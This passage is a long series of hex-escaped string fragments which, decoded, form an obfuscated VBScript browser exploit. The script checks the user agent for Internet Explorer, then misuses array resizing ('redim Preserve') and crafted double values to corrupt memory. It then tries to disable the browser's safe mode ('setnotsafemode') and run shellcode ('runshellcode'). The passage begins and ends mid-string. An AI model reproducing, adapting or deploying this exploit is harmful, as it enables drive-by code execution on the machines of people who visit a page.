\n\"\\x20\\x20\\x20\\x61\\x30\\x0d\\x0a\\x64\\x69\\x6d\\x20\\x20\\x20\\x61\\x31\\x0d\\x0a\\x64\\x69\\x6d\\x20\\x20\\x20\\x61\". \n\"\\x32\\x0d\\x0a\\x64\\x69\\x6d\\x20\\x20\\x20\\x61\\x33\\x0d\\x0a\\x64\\x69\\x6d\\x20\\x20\\x20\\x77\\x69\\x6e\\x39\\x78\". \n\"\\x0d\\x0a\\x64\\x69\\x6d\\x20\\x20\\x20\\x69\\x6e\\x74\\x56\\x65\\x72\\x73\\x69\\x6f\\x6e\\x0d\\x0a\\x64\\x69\\x6d\\x20\". \n\"\\x20\\x20\\x72\\x6e\\x64\\x61\\x0d\\x0a\\x64\\x69\\x6d\\x20\\x20\\x20\\x66\\x75\\x6e\\x63\\x6c\\x61\\x73\\x73\\x0d\\x0a\". \n\"\\x64\\x69\\x6d\\x20\\x20\\x20\\x6d\\x79\\x61\\x72\\x72\\x61\\x79\\x0d\\x0a\\x20\\x0d\\x0a\\x42\\x65\\x67\\x69\\x6e\\x28\". \n\"\\x29\\x0d\\x0a\\x20\\x0d\\x0a\\x66\\x75\\x6e\\x63\\x74\\x69\\x6f\\x6e\\x20\\x42\\x65\\x67\\x69\\x6e\\x28\\x29\\x0d\\x0a\". \n\"\\x20\\x20\\x4f\\x6e\\x20\\x45\\x72\\x72\\x6f\\x72\\x20\\x52\\x65\\x73\\x75\\x6d\\x65\\x20\\x4e\\x65\\x78\\x74\\x0d\\x0a\". \n\"\\x20\\x20\\x69\\x6e\\x66\\x6f\\x3d\\x4e\\x61\\x76\\x69\\x67\\x61\\x74\\x6f\\x72\\x2e\\x55\\x73\\x65\\x72\\x41\\x67\\x65\". \n\"\\x6e\\x74\\x0d\\x0a\\x20\\x0d\\x0a\\x20\\x20\\x69\\x66\\x28\\x69\\x6e\\x73\\x74\\x72\\x28\\x69\\x6e\\x66\\x6f\\x2c\\x22\". \n\"\\x57\\x69\\x6e\\x36\\x34\\x22\\x29\\x3e\\x30\\x29\\x20\\x20\\x20\\x74\\x68\\x65\\x6e\\x0d\\x0a\\x20\\x20\\x20\\x20\\x20\". \n\"\\x65\\x78\\x69\\x74\\x20\\x20\\x20\\x66\\x75\\x6e\\x63\\x74\\x69\\x6f\\x6e\\x0d\\x0a\\x20\\x20\\x65\\x6e\\x64\\x20\\x69\". \n\"\\x66\\x0d\\x0a\\x20\\x0d\\x0a\\x20\\x20\\x69\\x66\\x20\\x28\\x69\\x6e\\x73\\x74\\x72\\x28\\x69\\x6e\\x66\\x6f\\x2c\\x22\". \n\"\\x4d\\x53\\x49\\x45\\x22\\x29\\x3e\\x30\\x29\\x20\\x20\\x20\\x74\\x68\\x65\\x6e\\x20\\x0d\\x0a\\x20\\x20\\x20\\x20\\x20\". \n\"\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x69\\x6e\\x74\\x56\\x65\\x72\\x73\\x69\\x6f\\x6e\\x20\\x3d\\x20\\x43\\x49\\x6e\". \n\"\\x74\\x28\\x4d\\x69\\x64\\x28\\x69\\x6e\\x66\\x6f\\x2c\\x20\\x49\\x6e\\x53\\x74\\x72\\x28\\x69\\x6e\\x66\\x6f\\x2c\\x20\". \n\"\\x22\\x4d\\x53\\x49\\x45\\x22\\x29\\x20\\x2b\\x20\\x35\\x2c\\x20\\x32\\x29\\x29\\x20\\x20\\x20\\x0d\\x0a\\x20\\x20\\x65\". \n\"\\x6c\\x73\\x65\\x0d\\x0a\\x20\\x20\\x20\\x20\\x20\\x65\\x78\\x69\\x74\\x20\\x20\\x20\\x66\\x75\\x6e\\x63\\x74\\x69\\x6f\". \n\"\\x6e\\x20\\x20\\x0d\\x0a\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0d\\x0a\\x20\\x20\\x65\". \n\"\\x6e\\x64\\x20\\x69\\x66\\x0d\\x0a\\x20\\x0d\\x0a\\x20\\x20\\x77\\x69\\x6e\\x39\\x78\\x3d\\x30\\x0d\\x0a\\x20\\x0d\\x0a\". \n\"\\x20\\x20\\x42\\x65\\x67\\x69\\x6e\\x49\\x6e\\x69\\x74\\x28\\x29\\x0d\\x0a\\x20\\x20\\x49\\x66\\x20\\x43\\x72\\x65\\x61\". \n\"\\x74\\x65\\x28\\x29\\x3d\\x54\\x72\\x75\\x65\\x20\\x54\\x68\\x65\\x6e\\x0d\\x0a\\x20\\x20\\x20\\x20\\x20\\x6d\\x79\\x61\". \n\"\\x72\\x72\\x61\\x79\\x3d\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x63\\x68\\x72\\x77\\x28\\x30\\x31\\x29\\x26\\x63\\x68\". \n\"\\x72\\x77\\x28\\x32\\x31\\x37\\x36\\x29\\x26\\x63\\x68\\x72\\x77\\x28\\x30\\x31\\x29\\x26\\x63\\x68\\x72\\x77\\x28\\x30\". \n\"\\x30\\x29\\x26\\x63\\x68\\x72\\x77\\x28\\x30\\x30\\x29\\x26\\x63\\x68\\x72\\x77\\x28\\x30\\x30\\x29\\x26\\x63\\x68\\x72\". \n\"\\x77\\x28\\x30\\x30\\x29\\x26\\x63\\x68\\x72\\x77\\x28\\x30\\x30\\x29\\x0d\\x0a\\x20\\x20\\x20\\x20\\x20\\x6d\\x79\\x61\". \n\"\\x72\\x72\\x61\\x79\\x3d\\x6d\\x79\\x61\\x72\\x72\\x61\\x79\\x26\\x63\\x68\\x72\\x77\\x28\\x30\\x30\\x29\\x26\\x63\\x68\". \n\"\\x72\\x77\\x28\\x33\\x32\\x37\\x36\\x37\\x29\\x26\\x63\\x68\\x72\\x77\\x28\\x30\\x30\\x29\\x26\\x63\\x68\\x72\\x77\\x28\". \n\"\\x30\\x29\\x0d\\x0a\\x20\\x0d\\x0a\\x20\\x20\\x20\\x20\\x20\\x69\\x66\\x28\\x69\\x6e\\x74\\x56\\x65\\x72\\x73\\x69\\x6f\". \n\"\\x6e\\x3c\\x34\\x29\\x20\\x74\\x68\\x65\\x6e\\x0d\\x0a\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x64\\x6f\\x63\\x75\". \n\"\\x6d\\x65\\x6e\\x74\\x2e\\x77\\x72\\x69\\x74\\x65\\x28\\x22\\x3c\\x62\\x72\\x3e\\x20\\x49\\x45\\x22\\x29\\x0d\\x0a\\x20\". \n\"\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x64\\x6f\\x63\\x75\\x6d\\x65\\x6e\\x74\\x2e\\x77\\x72\\x69\\x74\\x65\\x28\\x69\". \n\"\\x6e\\x74\\x56\\x65\\x72\\x73\\x69\\x6f\\x6e\\x29\\x0d\\x0a\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x72\\x75\\x6e\". \n\"\\x73\\x68\\x65\\x6c\\x6c\\x63\\x6f\\x64\\x65\\x28\\x29\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\". \n\"\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0d\\x0a\\x20\\x20\\x20\\x20\\x20\\x65\\x6c\\x73\\x65\\x20\\x20\\x0d\\x0a\\x20\\x20\". \n\"\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x73\\x65\\x74\\x6e\\x6f\\x74\\x73\\x61\\x66\\x65\\x6d\\x6f\\x64\\x65\\x28\\x29\". \n\"\\x0d\\x0a\\x20\\x20\\x20\\x20\\x20\\x65\\x6e\\x64\\x20\\x69\\x66\\x0d\\x0a\\x20\\x20\\x65\\x6e\\x64\\x20\\x69\\x66\\x0d\". \n\"\\x0a\\x65\\x6e\\x64\\x20\\x66\\x75\\x6e\\x63\\x74\\x69\\x6f\\x6e\\x0d\\x0a\\x20\\x0d\\x0a\\x66\\x75\\x6e\\x63\\x74\\x69\". \n\"\\x6f\\x6e\\x20\\x42\\x65\\x67\\x69\\x6e\\x49\\x6e\\x69\\x74\\x28\\x29\\x0d\\x0a\\x20\\x20\\x20\\x52\\x61\\x6e\\x64\\x6f\". \n\"\\x6d\\x69\\x7a\\x65\\x28\\x29\\x0d\\x0a\\x20\\x20\\x20\\x72\\x65\\x64\\x69\\x6d\\x20\\x61\\x61\\x28\\x35\\x29\\x0d\\x0a\". \n\"\\x20\\x20\\x20\\x72\\x65\\x64\\x69\\x6d\\x20\\x61\\x62\\x28\\x35\\x29\\x0d\\x0a\\x20\\x20\\x20\\x61\\x30\\x3d\\x31\\x33\". \n\"\\x2b\\x31\\x37\\x2a\\x72\\x6e\\x64\\x28\\x36\\x29\\x0d\\x0a\\x20\\x20\\x20\\x61\\x33\\x3d\\x37\\x2b\\x33\\x2a\\x72\\x6e\". \n\"\\x64\\x28\\x35\\x29\\x0d\\x0a\\x65\\x6e\\x64\\x20\\x66\\x75\\x6e\\x63\\x74\\x69\\x6f\\x6e\\x0d\\x0a\\x20\\x0d\\x0a\\x66\". \n\"\\x75\\x6e\\x63\\x74\\x69\\x6f\\x6e\\x20\\x43\\x72\\x65\\x61\\x74\\x65\\x28\\x29\\x0d\\x0a\\x20\\x20\\x4f\\x6e\\x20\\x45\". \n\"\\x72\\x72\\x6f\\x72\\x20\\x52\\x65\\x73\\x75\\x6d\\x65\\x20\\x4e\\x65\\x78\\x74\\x0d\\x0a\\x20\\x20\\x64\\x69\\x6d\\x20\". \n\"\\x69\\x0d\\x0a\\x20\\x20\\x43\\x72\\x65\\x61\\x74\\x65\\x3d\\x46\\x61\\x6c\\x73\\x65\\x0d\\x0a\\x20\\x20\\x46\\x6f\\x72\". \n\"\\x20\\x69\\x20\\x3d\\x20\\x30\\x20\\x54\\x6f\\x20\\x34\\x30\\x30\\x0d\\x0a\\x20\\x20\\x20\\x20\\x49\\x66\\x20\\x4f\\x76\". \n\"\\x65\\x72\\x28\\x29\\x3d\\x54\\x72\\x75\\x65\\x20\\x54\\x68\\x65\\x6e\\x0d\\x0a\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x43\". \n\"\\x72\\x65\\x61\\x74\\x65\\x3d\\x54\\x72\\x75\\x65\\x0d\\x0a\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x45\\x78\\x69\\x74\\x20\". \n\"\\x46\\x6f\\x72\\x0d\\x0a\\x20\\x20\\x20\\x20\\x45\\x6e\\x64\\x20\\x49\\x66\\x20\\x0d\\x0a\\x20\\x20\\x4e\\x65\\x78\\x74\". \n\"\\x0d\\x0a\\x65\\x6e\\x64\\x20\\x66\\x75\\x6e\\x63\\x74\\x69\\x6f\\x6e\\x0d\\x0a\\x20\\x0d\\x0a\\x73\\x75\\x62\\x20\\x74\". \n\"\\x65\\x73\\x74\\x61\\x61\\x28\\x29\\x0d\\x0a\\x65\\x6e\\x64\\x20\\x73\\x75\\x62\\x0d\\x0a\\x20\\x0d\\x0a\\x66\\x75\\x6e\". \n\"\\x63\\x74\\x69\\x6f\\x6e\\x20\\x6d\\x79\\x64\\x61\\x74\\x61\\x28\\x29\\x0d\\x0a\\x20\\x20\\x20\\x20\\x4f\\x6e\\x20\\x45\". \n\"\\x72\\x72\\x6f\\x72\\x20\\x52\\x65\\x73\\x75\\x6d\\x65\\x20\\x4e\\x65\\x78\\x74\\x0d\\x0a\\x20\\x20\\x20\\x20\\x20\\x69\". \n\"\\x3d\\x74\\x65\\x73\\x74\\x61\\x61\\x0d\\x0a\\x20\\x20\\x20\\x20\\x20\\x69\\x3d\\x6e\\x75\\x6c\\x6c\\x0d\\x0a\\x20\\x20\". \n\"\\x20\\x20\\x20\\x72\\x65\\x64\\x69\\x6d\\x20\\x20\\x50\\x72\\x65\\x73\\x65\\x72\\x76\\x65\\x20\\x61\\x61\\x28\\x61\\x32\". \n\"\\x29\\x20\\x20\\x0d\\x0a\\x20\\x20\\x20\\x0d\\x0a\\x20\\x20\\x20\\x20\\x20\\x61\\x62\\x28\\x30\\x29\\x3d\\x30\\x0d\\x0a\". \n\"\\x20\\x20\\x20\\x20\\x20\\x61\\x61\\x28\\x61\\x31\\x29\\x3d\\x69\\x0d\\x0a\\x20\\x20\\x20\\x20\\x20\\x61\\x62\\x28\\x30\". \n\"\\x29\\x3d\\x36\\x2e\\x33\\x36\\x35\\x39\\x38\\x37\\x33\\x37\\x34\\x33\\x37\\x38\\x30\\x31\\x45\\x2d\\x33\\x31\\x34\\x0d\". \n\"\\x0a\\x20\\x0d\\x0a\\x20\\x20\\x20\\x20\\x20\\x61\\x61\\x28\\x61\\x31\\x2b\\x32\\x29\\x3d\\x6d\\x79\\x61\\x72\\x72\\x61\". \n\"\\x79\\x0d\\x0a\\x20\\x20\\x20\\x20\\x20\\x61\\x62\\x28\\x32\\x29\\x3d\\x31\\x2e\\x37\\x34\\x30\\x38\\x38\\x35\\x33\\x34\". \n\"\\x37\\x33\\x31\\x33\\x32\\x34\\x45\\x2d\\x33\\x31\\x30\\x20\\x20\\x0d\\x0a\\x20\\x20\\x20\\x20\\x20\\x6d\\x79\\x64\\x61\". \n\"\\x74\\x61\\x3d\\x61\\x61\\x28\\x61\\x31\\x29\\x0d\\x0a\\x20\\x20\\x20\\x20\\x20\\x72\\x65\\x64\\x69\\x6d\\x20\\x20\\x50\". \n\"\\x72\\x65\\x73\\x65\\x72\\x76\\x65\\x20\\x61\\x61\\x28\\x61\\x30\\x29\\x20\\x20\\x0d\\x0a\\x65\\x6e\\x64\\x20\\x66\\x75\". \n\"\\x6e\\x63\\x74\\x69\\x6f\\x6e\\x20\\x0d\\x0a\\x20\\x0d\\x0a\\x20\\x0d\\x0a\\x66\\x75\\x6e\\x63\\x74\\x69\\x6f\\x6e\\x20\". \n\"\\x73\\x65\\x74\\x6e\\x6f\\x74\\x73\\x61\\x66\\x65\\x6d\\x6f\\x64\\x65\\x28\\x29\\x0d\\x0a\\x20\\x20\\x20\\x20\\x4f\\x6e\". \n\"\\x20\\x45\\x72\\x72\\x6f\\x72\\x20\\x52\\x65\\x73\\x75\\x6d\\x65\\x20\\x4e\\x65\\x78\\x74\\x0d\\x0a\\x20\\x20\\x20\\x20\". \n\"\\x69\\x3d\\x6d\\x79\\x64\\x61\\x74\\x61\\x28\\x29\\x20\\x20\\x0d\\x0a\\x20\\x20\\x20\\x20\\x69\\x3d\\x72\\x75\\x6d\\x28\". \n\"\\x69\\x2b\\x38\\x29\\x0d\\x0a\\x20\\x20\\x20\\x20\\x69\\x3d\\x72\\x75\\x6d\\x28\\x69\\x2b\\x31\\x36\\x29\\x0d\\x0a\\x20\". \n\"\\x20\\x20\\x20\\x6a\\x3d\\x72\\x75\\x6d\\x28\\x69\\x2b\\x26\\x68\\x31\\x33\\x34\\x29\\x20\\x20\\x0d\\x0a\\x20\\x20\\x20\". \n\"\\x20\\x66\\x6f\\x72\\x20\\x6b\\x3d\\x30\\x20\\x74\\x6f\\x20\\x26\\x68\\x36\\x30\\x20\\x73\\x74\\x65\\x70\\x20\\x34\\x0d\". \n\"\\x0a\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x6a\\x3d\\x72\\x75\\x6d\\x28\\x69\\x2b\\x26\\x68\\x31\\x32\\x30\\x2b\\x6b\". \n\"\\x29\\x0d\\x0a\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x69\\x66\\x28\\x6a\\x3d\\x31\\x34\\x29\\x20\\x74\\x68\\x65\\x6e\". \n\"\\x0d\\x0a\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x6a\\x3d\\x30\\x20\\x20\\x20\\x20\\x20\". \n\"\\x20\\x20\\x20\\x20\\x20\\x0d\\x0a\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x72\\x65\\x64\". \n\"\\x69\\x6d\\x20\\x20\\x50\\x72\\x65\\x73\\x65\\x72\\x76\\x65\\x20\\x61\\x61\\x28\\x61\\x32\\x29\\x20\\x20\\x20\\x20\\x20\". \n\"\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0d\\x0a\\x20\\x20\\x20\\x20\\x20\\x61\\x61\\x28\\x61\\x31\\x2b\\x32\\x29\\x28\". \n\"\\x69\\x2b\\x26\\x68\\x31\\x31\\x63\\x2b\\x6b\\x29\\x3d\\x61\\x62\\x28\\x34\\x29\\x0d\\x0a\\x20\\x20\\x20\\x20\\x20\\x20\". \n\"\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x72\\x65\\x64\\x69\\x6d\\x20\\x20\\x50\\x72\\x65\\x73\\x65\\x72\\x76\\x65\\x20\". \n\"\\x61\\x61\\x28\\x61\\x30\\x29\\x20\\x20\\x0d\\x0a\\x20\\x0d\\x0a\\x20\\x20\\x20\\x20\\x20\\x6a\\x3d\\x30\\x20\\x0d\\x0a\". \n\"\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x6a\\x3d\\x72\\x75\\x6d\\x28\\x69\\x2b\\x26\\x68\". \n\"\\x31\\x32\\x30\\x2b\\x6b\\x29\\x20\\x20\\x20\\x0d\\x0a\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0d\\x0a\\x20\". \n\"\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x45\\x78\\x69\\x74\\x20\\x66\\x6f\\x72\\x0d\\x0a\". \n\"\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x65\\x6e\\x64\\x20\\x69\\x66\\x0d\\x0a\\x20\\x0d\\x0a\\x20\\x20\". \n\"\\x20\\x20\\x6e\\x65\\x78\\x74\\x20\\x0d\\x0a\\x20\\x20\\x20\\x20\\x61\\x62\\x28\\x32\\x29\\x3d\\x31\\x2e\\x36\\x39\\x37\". \n\"\\x35\\x39\\x36\\x36\\x33\\x33\\x31\\x36\\x37\\x34\\x37\\x45\\x2d\\x33\\x31\\x33\\x0d\\x0a\\x20\\x20\\x20\\x20\\x72\\x75\". \n\"\\x6e\\x6d\\x75\\x6d\\x61\\x61\\x28\\x29\\x20\\x0d\\x0a\\x65\\x6e\\x64\\x20\\x66\\x75\\x6e\\x63\\x74\\x69\\x6f\\x6e\\x0d\". \n\"\\x0a\\x20\\x0d\\x0a\\x66\\x75\\x6e\\x63\\x74\\x69\\x6f\\x6e\\x20\\x4f\\x76\\x65\\x72\\x28\\x29\\x0d\\x0a\\x20\\x20\\x20\". \n\"\\x20\\x4f\\x6e\\x20\\x45\\x72\\x72\\x6f\\x72\\x20\\x52\\x65\\x73\\x75\\x6d\\x65\\x20\\x4e\\x65\\x78\\x74\\x0d\\x0a\\x20\". \n\"\\x20\\x20\\x20\\x64\\x69\\x6d\\x20\\x74\\x79\\x70\\x65\\x31\\x2c\\x74\\x79\\x70\\x65\\x32\\x2c\\x74\\x79\\x70\\x65\\x33\". \n\"\\x0d\\x0a\\x20\\x20\\x20\\x20\\x4f\\x76\\x65\\x72\\x3d\\x46\\x61\\x6c\\x73\\x65\\x0d\\x0a\\x20\\x20\\x20\\x20\\x61\\x30\". \n\"\\x3d\\x61\\x30\\x2b\\x61\\x33\\x0d\\x0a\\x20\\x20\\x20\\x20\\x61\\x31\\x3d\\x61\\x30\\x2b\\x32\\x0d\\x0a\\x20\\x20\\x20\". \n\"\\x20\\x61\\x32\\x3d\\x61\\x30\\x2b\\x26\\x68\\x38\\x30\\x30\\x30\\x30\\x30\\x30\\x0d\\x0a\\x20\\x20\\x20\\x0d\\x0a\\x20\". \n\"\\x20\\x20\\x20\\x72\\x65\\x64\\x69\\x6d\\x20\\x20\\x50\\x72\\x65\\x73\\x65\\x72\\x76\\x65\\x20\\x61\\x61\\x28\\x61\\x30\". \n\"\\x29\\x20\\x0d\\x0a\\x20\\x20\\x20\\x20\\x72\\x65\\x64\\x69\\x6d\\x20\\x20\\x20\\x61\\x62\\x28\\x61\\x30\\x29\\x20\\x20\". \n\"\\x20\\x20\\x20\\x0d\\x0a\\x20\\x20\\x20\\x0d\\x0a\\x20\\x20\\x20\\x20\\x72\\x65\\x64\\x69\\x6d\\x20\\x20\\x50\\x72\\x65\". \n\"\\x73\\x65\\x72\\x76\\x65\\x20\\x61\\x61\\x28\\x61\\x32\\x29\\x0d\\x0a\\x20\\x20\\x20\\x0d\\x0a\\x20\\x20\\x20\\x20\\x74\". \n\"\\x79\\x70\\x65\\x31\\x3d\\x31\\x0d\\x0a\\x20\\x20\\x20\\x20\\x61\\x62\\x28\\x30\\x29\\x3d\\x31\\x2e\\x31\\x32\\x33\\x34\". \n\"\\x35\\x36\\x37\\x38\\x39\\x30\\x31\\x32\\x33\\x34\\x35\\x36\\x37\\x38\\x39\\x30\\x31\\x32\\x33\\x34\\x35\\x36\\x37\\x38\". \n\"\\x39\\x30\\x0d\\x0a\\x20\\x20\\x20\\x20\\x61\\x61\\x28\\x61\\x30\\x29\\x3d\\x31\\x30\\x0d\\x0a\\x20\\x20\\x20\\x20\\x20\". \n\"\\x20\\x20\\x20\\x20\\x20\\x20\\x0d\\x0a\\x20\\x20\\x20\\x20\\x49\\x66\\x28\\x49\\x73\\x4f\\x62\\x6a\\x65\\x63\\x74\\x28\". \n\"\\x61\\x61\\x28\\x61\\x31\\x2d\\x31\\x29\\x29\\x20\\x3d\\x20\\x46\\x61\\x6c\\x73\\x65\\x29\\x20\\x54\\x68\\x65\\x6e\\x0d\". \n\"\\x0a\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x69\\x66\\x28\\x69\\x6e\\x74\\x56\\x65\\x72\\x73\\x69\\x6f\\x6e\\x3c\\x34\\x29\". \n\"\\x20\\x74\\x68\\x65\\x6e\\x0d\\x0a\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x6d\\x65\\x6d\\x3d\\x63\\x69\". \n\"\\x6e\\x74\\x28\\x61\\x30\\x2b\\x31\\x29\\x2a\\x31\\x36\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\". \n\"\\x0d\\x0a\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x6a\\x3d\\x76\\x61\\x72\\x74\\x79\\x70\\x65\\x28\\x61\". \n\"\\x61\\x28\\x61\\x31\\x2d\\x31\\x29\\x29\\x0d\\x0a\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x69\\x66\\x28\". \n\"\\x28\\x6a\\x3d\\x6d\\x65\\x6d\\x2b\\x34\\x29\\x20\\x6f\\x72\\x20\\x28\\x6a\\x2a\\x38\\x3d\\x6d\\x65\\x6d\\x2b\\x38\\x29\". \n\"\\x29\\x20\\x74\\x68\\x65\\x6e\\x0d\\x0a\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x69\\x66\". \n\"\\x28\\x76\\x61\\x72\\x74\\x79\\x70\\x65\\x28\\x61\\x61\\x28\\x61\\x31\\x2d\\x31\\x29\\x29\\x3c\\x3e\\x30\\x29\\x20\\x20\". \n\"\\x54\\x68\\x65\\x6e\\x20\\x20\\x20\\x20\\x0d\\x0a\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\". \n\"\\x20\\x20\\x20\\x49\\x66\\x28\\x49\\x73\\x4f\\x62\\x6a\\x65\\x63\\x74\\x28\\x61\\x61\\x28\\x61\\x31\\x29\\x29\\x20\\x3d\". \n\"\\x20\\x46\\x61\\x6c\\x73\\x65\\x20\\x29\\x20\\x54\\x68\\x65\\x6e\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\". \n\"\\x20\\x20\\x0d\\x0a\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x74\". \n\"\\x79\\x70\\x65\\x31\\x3d\\x56\\x61\\x72\\x54\\x79\\x70\\x65\\x28\\x61\\x61\\x28\\x61\\x31\\x29\\x29\\x0d\\x0a\\x20\\x20\". \n\"\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x65\\x6e\\x64\\x20\\x69\\x66\\x20\\x20\\x20\". \n\"\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0d\\x0a\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\". \n\"\\x20\\x20\\x20\\x20\\x65\\x6e\\x64\\x20\\x69\\x66\\x0d\\x0a\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x65\". \n\"\\x6c\\x73\\x65\\x0d\\x0a\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x72\\x65\\x64\\x69\\x6d\\x20\". \n\"\\x20\\x50\\x72\\x65\\x73\\x65\\x72\\x76\\x65\\x20\\x61\\x61\\x28\\x61\\x30\\x29\\x0d\\x0a\\x20\\x20\\x20\\x20\\x20\\x20\". \n\"\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x65\\x78\\x69\\x74\\x20\\x20\\x66\\x75\\x6e\\x63\\x74\\x69\\x6f\\x6e\\x0d\\x0a\\x20\". \n\"\\x0d\\x0a\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x65\\x6e\\x64\\x20\\x69\\x66\\x20\\x0d\\x0a\\x20\\x20\". \n\"\\x20\\x20\\x20\\x20\\x20\\x20\\x65\\x6c\\x73\\x65\\x0d\\x0a\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x69\". \n\"\\x66\\x28\\x76\\x61\\x72\\x74\\x79\\x70\\x65\\x28\\x61\\x61\\x28\\x61\\x31\\x2d\\x31\\x29\\x29\\x3c\\x3e\\x30\\x29\\x20\". \n\"\\x20\\x54\\x68\\x65\\x6e\\x20\\x20\\x20\\x20\\x0d\\x0a\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\". \n\"\\x20\\x49\\x66\\x28\\x49\\x73\\x4f\\x62\\x6a\\x65\\x63\\x74\\x28\\x61\\x61\\x28\\x61\\x31\\x29\\x29\\x20\\x3d\\x20\\x46\". \n\"\\x61\\x6c\\x73\\x65\\x20\\x29\\x20\\x54\\x68\\x65\\x6e\\x0d\\x0a\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\". \n\"\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x74\\x79\\x70\\x65\\x31\\x3d\\x56\\x61\\x72\\x54\\x79\\x70\\x65\\x28\\x61\\x61\\x28\". \n\"\\x61\\x31\\x29\\x29\\x0d\\x0a\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x65\\x6e\\x64\\x20\". \n\"\\x69\\x66\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0d\\x0a\\x20\\x20\\x20\\x20\\x20\". \n\"\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x65\\x6e\\x64\\x20\\x69\\x66\\x0d\\x0a\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x65\". \n\"\\x6e\\x64\\x20\\x69\\x66\\x0d\\x0a\\x20\\x20\\x20\\x20\\x65\\x6e\\x64\\x20\\x69\\x66\\x0d\\x0a\\x20\\x20\\x20\\x20\\x20\". \n\"\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0d\\x0a\\x20\\x20\\x20\\x20\\x20\\x0d\\x0a\\x20\\x20\\x20\\x20\\x49\". \n\"\\x66\\x28\\x74\\x79\\x70\\x65\\x31\\x3d\\x26\\x68\\x32\\x66\\x36\\x36\\x29\\x20\\x54\\x68\\x65\\x6e\\x20\\x20\\x20\\x20\". \n\"\\x20\\x20\\x20\\x20\\x20\\x0d\\x0a\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x4f\\x76\\x65\\x72\\x3d\\x54\\x72\". \n\"\\x75\\x65\\x20\\x20\\x20\\x20\\x20\\x20\\x0d\\x0a\\x20\\x20\\x20\\x20\\x45\\x6e\\x64\\x20\\x49\\x66\\x20\\x20\\x0d\\x0a\". \n\"\\x20\\x20\\x20\\x20\\x49\\x66\\x28\\x74\\x79\\x70\\x65\\x31\\x3d\\x26\\x68\\x42\\x39\\x41\\x44\\x29\\x20\\x54\\x68\\x65\". \n\"\\x6e\\x0d\\x0a\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x4f\\x76\\x65\\x72\\x3d\\x54\\x72\\x75\\x65\\x0d\\x0a\". \n\"\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x77\\x69\\x6e\\x39\\x78\\x3d\\x31\\x0d\\x0a\\x20\\x20\\x20\\x20\\x45\". \n\"\\x6e\\x64\\x20\\x49\\x66\\x20\\x20\\x0d\\x0a\\x20\\x0d\\x0a\\x20\\x20\\x20\\x20\\x72\\x65\\x64\\x69\\x6d\\x20\\x20\\x50\". \n\"\\x72\\x65\\x73\\x65\\x72\\x76\\x65\\x20\\x61\\x61\\x28\\x61\\x30\\x29\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\". 